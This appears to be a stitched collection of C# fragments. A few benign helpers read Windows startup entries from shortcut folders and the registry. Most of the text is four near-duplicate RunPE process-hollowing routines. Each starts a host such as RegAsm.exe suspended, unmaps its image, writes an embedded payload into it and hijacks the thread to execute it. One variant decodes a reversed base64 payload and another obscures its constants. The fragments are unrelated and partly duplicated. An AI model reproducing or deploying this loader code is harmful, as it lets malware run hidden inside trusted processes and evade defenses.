public static Process CreateProcess(string executablePath, string commandline, string desktopName)
{
executablePath = Path.GetFullPath(executablePath);
commandline = string.Format("{0} {1}", executablePath, commandline);
if (!File.Exists(executablePath))
{
throw new FileNotFoundException("The applicaiton file was not found.", executablePath);
}
var startInfo = new StartupInformation();
startInfo.cb = Marshal.SizeOf(typeof(StartupInformation));
startInfo.lpDesktop = desktopName;
ProcessInformation processInfo;
var result = CreateProcess(executablePath, commandline, IntPtr.Zero, IntPtr.Zero, true, NormalPriorityClass, IntPtr.Zero, Path.GetDirectoryName(executablePath), ref startInfo, out processInfo);
if (!result)
{
throw new Win32Exception(Marshal.GetLastWin32Error());
}
return(Process.GetProcessById(processInfo.dwProcessId));
}
/// <summary>
/// 指定したフォルダに登録されているスタートアップを取得
/// </summary>
/// <param name="startup_information">スタートアップ情報</param>
/// <param name="startup_register_place">登録情報</param>
/// <param name="startup_folder_path">パス</param>
private static void GetDesignationFolder(
ref System.Collections.Generic.List <StartupInformation> startup_information,
StartupRegisterPlace startup_register_place,
string startup_folder_path
)
{
try
{
string[] file_path = System.IO.Directory.GetFiles(startup_folder_path, "*.lnk", System.IO.SearchOption.TopDirectoryOnly); // ファイルパス
foreach (string now_file_path in file_path)
{
try
{
IWshRuntimeLibrary.IWshShell_Class shell = new IWshRuntimeLibrary.IWshShell_Class();
IWshRuntimeLibrary.IWshShortcut_Class shortcut = (IWshRuntimeLibrary.IWshShortcut_Class)shell.CreateShortcut(now_file_path);
StartupInformation new_startup_information = new StartupInformation
{
Path = shortcut.TargetPath,
RegisterName = System.IO.Path.GetFileNameWithoutExtension(shortcut.FullName),
Parameter = shortcut.Arguments,
WorkingDirectory = shortcut.WorkingDirectory,
RegisterPlace = startup_register_place
};
switch (shortcut.WindowStyle)
{
case 1:
new_startup_information.WindowState = WindowState.Normal;
break;
case 3:
new_startup_information.WindowState = WindowState.Maximized;
break;
case 7:
new_startup_information.WindowState = WindowState.Minimized;
break;
}
startup_information.Add(new_startup_information);
}
catch
{
}
}
}
catch
{
}
}
/// <summary>
/// 指定したレジストリに登録されているスタートアップを取得
/// </summary>
/// <param name="startup_information">スタートアップ情報</param>
/// <param name="startup_register_place">登録場所</param>
/// <param name="registry_hive_path">RegistryHivePath</param>
private static void GetDesignationRegistry(
ref System.Collections.Generic.List <StartupInformation> startup_information,
StartupRegisterPlace startup_register_place,
RegistryHivePath registry_hive_path
)
{
try
{
using (Microsoft.Win32.RegistryKey base_registry_key = Microsoft.Win32.RegistryKey.OpenBaseKey(registry_hive_path.RegistryHive, Microsoft.Win32.RegistryView.Default))
{
using (Microsoft.Win32.RegistryKey sub_registry_key = base_registry_key.OpenSubKey(registry_hive_path.Path))
{
string[] value_name = sub_registry_key.GetValueNames(); // 名前
for (int count = 0; count < value_name.Length; count++)
{
try
{
string key_value = (string)sub_registry_key.GetValue(value_name[count]); // 値
if (key_value.Length != 0)
{
string path; // パス
string parameter; // パラメータ
SeparateFullPathParameter(key_value, out path, out parameter);
StartupInformation new_startup_information = new StartupInformation
{
RegisterName = value_name[count],
Path = path,
Parameter = parameter,
RegisterPlace = startup_register_place
};
startup_information.Add(new_startup_information);
}
}
catch
{
}
}
}
}
}
catch
{
}
}
public static void Main()
{
string path = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe");
byte[] payload = Convert.FromBase64String(Strings.StrReverse("REVERSEBASE64APPCODE"));
for (int i = 0; i < 5; i++)
{
int readWrite = 0x0;
StartupInformation si = new StartupInformation();
ProcessInformation pi = new ProcessInformation();
si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
try
{
if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 0x00000004 | 0x08000000, IntPtr.Zero, null, ref si, ref pi))
{
throw new Exception();
}
int fileAddress = BitConverter.ToInt32(payload, 0x3C);
int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34);
int[] context = new int[0xB3];
context[0x0] = 0x10002;
if (IntPtr.Size == 0x4)
{
if (!GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
int ebx = context[0x29];
int baseAddress = 0x0;
if (!ReadProcessMemory(pi.ProcessHandle, ebx + 0x8, ref baseAddress, 0x4, ref readWrite))
{
throw new Exception();
}
if (imageBase == baseAddress)
{
if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0x0)
{
throw new Exception();
}
}
int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50);
int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54);
bool allowOverride = false;
int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40);
if (newImageBase == 0x0)
{
throw new Exception();
}
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite))
{
throw new Exception();
}
int sectionOffset = fileAddress + 0xF8;
short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 0x6);
for (int I = 0; I < numberOfSections; I++)
{
int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xC);
int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10);
int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14);
if (sizeOfRawData != 0x0)
{
byte[] sectionData = new byte[sizeOfRawData];
Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0x0, sectionData.Length);
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite))
{
throw new Exception();
}
}
sectionOffset += 0x28;
}
byte[] pointerData = BitConverter.GetBytes(newImageBase);
if (!WriteProcessMemory(pi.ProcessHandle, ebx + 0x8, pointerData, 0x4, ref readWrite))
{
throw new Exception();
}
int addressOfEntryPoint = BitConverter.ToInt32(payload, fileAddress + 0x28);
if (allowOverride)
{
newImageBase = imageBase;
}
context[0x2C] = newImageBase + addressOfEntryPoint;
if (IntPtr.Size == 0x4)
{
if (!SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
if (ResumeThread(pi.ThreadHandle) == -1)
{
throw new Exception();
}
}
catch
{
Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
continue;
}
break;
}
}
private static bool HandleRun(string path, byte[] data, bool protect)
{
int readWrite = 0;
string quotedPath = "";
StartupInformation si = new StartupInformation();
ProcessInformation pi = new ProcessInformation();
si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
try
{
if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 2 + 2, IntPtr.Zero, null, ref si, ref pi))
{
throw new Exception();
}
int fileAddress = BitConverter.ToInt32(data, 120 / 2);
int imageBase = BitConverter.ToInt32(data, fileAddress + 26 + 26);
int[] context = new int[179];
context[0] = 32769 + 32769;
if (IntPtr.Size == 8 / 2)
{
if (!GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
int ebx = context[41];
int baseAddress = 1 - 1;
if (!ReadProcessMemory(pi.ProcessHandle, ebx + 4 + 4, ref baseAddress, 2 + 2, ref readWrite))
{
throw new Exception();
}
if (imageBase == baseAddress)
{
if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 1 - 1)
{
throw new Exception();
}
}
int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 160 / 2);
int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 42 + 42);
bool allowOverride = false;
int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 6144 + 6144, 32 + 32);
if (newImageBase == 0)
{
throw new Exception();
}
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite))
{
throw new Exception();
}
int sectionOffset = fileAddress + 124 * 2;
short numberOfSections = BitConverter.ToInt16(data, fileAddress + 3 + 3);
for (int I = 1 - 1; I < numberOfSections; I++)
{
int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 6 + 6);
int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 8 + 8);
int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 40 / 2);
if (sizeOfRawData != 1 - 1)
{
byte[] sectionData = new byte[sizeOfRawData];
Buffer.BlockCopy(data, pointerToRawData, sectionData, 2 - 2, sectionData.Length);
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite))
{
throw new Exception();
}
}
sectionOffset += 120 / 3;
}
byte[] pointerData = BitConverter.GetBytes(newImageBase);
if (!WriteProcessMemory(pi.ProcessHandle, ebx + 16 / 2, pointerData, 2 * 2, ref readWrite))
{
throw new Exception();
}
int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 80 / 2);
if (allowOverride)
{
newImageBase = imageBase;
}
context[22 + 22] = newImageBase + addressOfEntryPoint;
if (IntPtr.Size == 2 + 2)
{
if (!SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
if (ResumeThread(pi.ThreadHandle) == -1)
{
throw new Exception();
}
if (protect)
{
Protect(pi.ProcessHandle);
}
}
catch
{
Process p = Process.GetProcessById(Convert.ToInt32(pi.ProcessId));
p.Kill();
return(false);
}
return(true);
}
private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
static extern bool CreateProcess(string lpApplicationName,
string lpCommandLine, IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes, bool bInheritHandles,
uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
ref StartupInformation lpStartupInfo,
out ProcessInformation lpProcessInformation);
public static void Run(string path, byte[] payload)
{
for (int i = 0; i < 5; i++)
{
int bytesRead = 0;
StartupInformation si = new StartupInformation
{
Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)))
};
ProcessInformation pi = new ProcessInformation();
try
{
if (!CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x8000004, IntPtr.Zero, null, ref si, ref pi))
{
throw new Exception();
}
int fileAddress = BitConverter.ToInt32(payload, 0x3c);
int imageBase = BitConverter.ToInt32(payload, fileAddress + 0x34);
int[] context = new int[0xb3];
context[0] = 0x10002;
if (IntPtr.Size == 4)
{
if (!GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64GetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
int ebx = context[0x29];
int baseAddress = 0;
if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref bytesRead))
{
throw new Exception();
}
if (imageBase == baseAddress && ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0)
{
throw new Exception();
}
int sizeOfImage = BitConverter.ToInt32(payload, fileAddress + 0x50);
int sizeOfHeaders = BitConverter.ToInt32(payload, fileAddress + 0x54);
int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 0x3000, 0x40);
if (newImageBase == 0)
{
throw new Exception();
}
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref bytesRead))
{
throw new Exception();
}
for (int j = 0, sectionOffset = fileAddress + 0xf8; j < BitConverter.ToInt16(payload, fileAddress + 6); j++)
{
int virtualAddress = BitConverter.ToInt32(payload, sectionOffset + 0xc);
int sizeOfRawData = BitConverter.ToInt32(payload, sectionOffset + 0x10);
int pointerToRawData = BitConverter.ToInt32(payload, sectionOffset + 0x14);
if (sizeOfRawData != 0)
{
byte[] sectionData = new byte[sizeOfRawData];
Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length);
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref bytesRead))
{
throw new Exception();
}
}
sectionOffset += 0x28;
}
if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, BitConverter.GetBytes(newImageBase), 4, ref bytesRead))
{
throw new Exception();
}
context[0x2c] = newImageBase + BitConverter.ToInt32(payload, fileAddress + 0x28);
if (IntPtr.Size == 4)
{
if (!SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
else
{
if (!Wow64SetThreadContext(pi.ThreadHandle, context))
{
throw new Exception();
}
}
if (ResumeThread(pi.ThreadHandle) == -1)
{
throw new Exception();
}
}
catch
{
Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
continue;
}
break;
}
}
public static bool RunDank(string path, string cmd, byte[] data)
{
int readWrite = 0;
string quotedPath = string.Format("\"{0}\"", path);
StartupInformation si = new StartupInformation();
ProcessInformation pi = new ProcessInformation();
si.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(StartupInformation)));
if (string.IsNullOrEmpty(cmd))
{
if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi))
{
return(false);
}
}
else
{
quotedPath = quotedPath + " " + cmd;
if (!CreateProcess(path, quotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref si, ref pi))
{
return(false);
}
}
int fileAddress = BitConverter.ToInt32(data, 60);
int imageBase = BitConverter.ToInt32(data, fileAddress + 52);
int[] context = new int[179];
context[0] = 65538;
if (!GetThreadContext(pi.ThreadHandle, context))
{
return(false);
}
int ebx = context[41];
int baseAddress = 0;
if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite))
{
return(false);
}
if (imageBase == baseAddress)
{
if (NtUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0)
{
return(false);
}
}
int sizeOfImage = BitConverter.ToInt32(data, fileAddress + 80);
int sizeOfHeaders = BitConverter.ToInt32(data, fileAddress + 84);
bool allowOverride = false;
int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64);
if (newImageBase == 0)
{
allowOverride = true;
newImageBase = VirtualAllocEx(pi.ProcessHandle, 0, sizeOfImage, 12288, 64);
if (newImageBase == 0)
{
return(false);
}
}
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, data, sizeOfHeaders, ref readWrite))
{
return(false);
}
int sectionOffset = fileAddress + 248;
short numberOfSections = BitConverter.ToInt16(data, fileAddress + 6);
for (int I = 0; I <= numberOfSections - 1; I++)
{
int virtualAddress = BitConverter.ToInt32(data, sectionOffset + 12);
int sizeOfRawData = BitConverter.ToInt32(data, sectionOffset + 16);
int pointerToRawData = BitConverter.ToInt32(data, sectionOffset + 20);
if (sizeOfRawData != 0)
{
byte[] sectionData = new byte[sizeOfRawData];
Buffer.BlockCopy(data, pointerToRawData, sectionData, 0, sectionData.Length);
if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite))
{
return(false);
}
}
sectionOffset += 40;
}
byte[] pointerData = BitConverter.GetBytes(newImageBase);
if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, pointerData, 4, ref readWrite))
{
return(false);
}
int addressOfEntryPoint = BitConverter.ToInt32(data, fileAddress + 40);
if (allowOverride)
{
newImageBase = imageBase;
}
context[44] = newImageBase + addressOfEntryPoint;
if (!SetThreadContext(pi.ThreadHandle, context))
{
return(false);
}
if (ResumeThread(pi.ThreadHandle) == -1)
{
return(false);
}
return(true);
}
